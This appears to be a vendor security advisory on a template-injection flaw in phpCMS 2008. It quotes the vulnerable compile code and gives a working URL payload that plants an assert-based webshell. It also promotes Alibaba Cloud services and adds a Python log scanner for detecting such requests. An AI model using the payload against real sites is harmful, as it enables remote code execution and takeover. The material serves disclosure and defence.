New Vulnerability Found in the Decade-Old phpCMS 2008 Can Lead to Fresh WebShell Attacks

Vulnerability Details

/type.php?template=tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

Vulnerability Principles

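// Request handling: $template comes from the template= parameter shown in the URL above.
if(empty($template)) $template = 'type';
...
include template('phpcms', $template);

// Compilation is triggered with the same $template value.
template_compile($module, $template, $istag);

function template_compile($module, $template, $istag = 0)
{
    ...
    // $template becomes part of the compiled file's path.
    $compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
    // When $istag is set or the name starts with 'tag_', $template also becomes part of a PHP function name in the generated source.
    $content = ($istag || substr($template, 0, 4) == 'tag_') ? '<?php function _tag_'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>' : template_parse($content);
    // The generated source is written to disk as a .tpl.php file.
    $strlen = file_put_contents($compiledtplfile, $content);
    ...
}

tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss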

Impact Scope

Security Recommendations

Manual Repair

Security Hardening

  1. Alibaba Cloud Firewall already provides intrusion defenses against this type of vulnerability. You can enable Alibaba Cloud Firewall’s IPS interception mode and virtual patching feature to defend against and intercept attacks that exploit this vulnerability, without having to manually repair it. At the time of writing, Alibaba Cloud Firewall is only available for mainland China accounts. Learn more at https://www.aliyun.com/product/cfw
  2. By purchasing Alibaba Cloud Managed Security Service, you can perform security hardening and optimization with guidance from Alibaba Cloud security experts, which will protect you against this and other subsequent vulnerabilities.
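
To check whether a site has already received requests of the shape shown under Vulnerability Details, web access logs can be searched for type.php requests whose template value is not a plain identifier. This is an added example, not code from the original article or from phpCMS; the allowlist for template names, the combined log format and the sample log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Assumption: legitimate template names are plain identifiers.
SAFE_TEMPLATE = re.compile(r"[A-Za-z0-9_-]+")
# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_template(target):
    """Return the decoded template value if it breaks the allowlist, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/type.php"):
        return None
    # parse_qs drops blank values; the page's code defaults an empty template to 'type'.
    for value in parse_qs(parts.query).get("template", []):
        decoded = unquote(value)  # second decode catches double-encoded values
        if not SAFE_TEMPLATE.fullmatch(decoded):
            return decoded
    return None

def scan(lines):
    """Return (line number, client address, template value) for each hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        bad = suspicious_template(match.group(1)) if match else None
        if bad is not None:
            hits.append((number, line.split()[0], bad))
    return hits

# Value quoted under "Vulnerability Details" on this page.
PAGE_VALUE = "tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss"
ENCODED = quote(PAGE_VALUE, safe="")

# Constructed sample log lines (documentation addresses, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2019:10:00:00 +0000] "GET /type.php?template=type HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2019:10:00:05 +0000] "GET /type.php?template=%s HTTP/1.1" 200 0' % ENCODED,
    '203.0.113.9 - - [01/Jan/2019:10:00:06 +0000] "GET /type.php?template=%s HTTP/1.1" 200 0' % quote(ENCODED, safe=""),
    '198.51.100.4 - - [01/Jan/2019:10:00:09 +0000] "GET /index.php?template=a/b HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit only shows that such a request was received; whether a file was written has to be confirmed on the server itself.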

Follow me to keep abreast of the latest technology news, industry insights, and developer trends. Alibaba Cloud website: https://www.alibabacloud.com
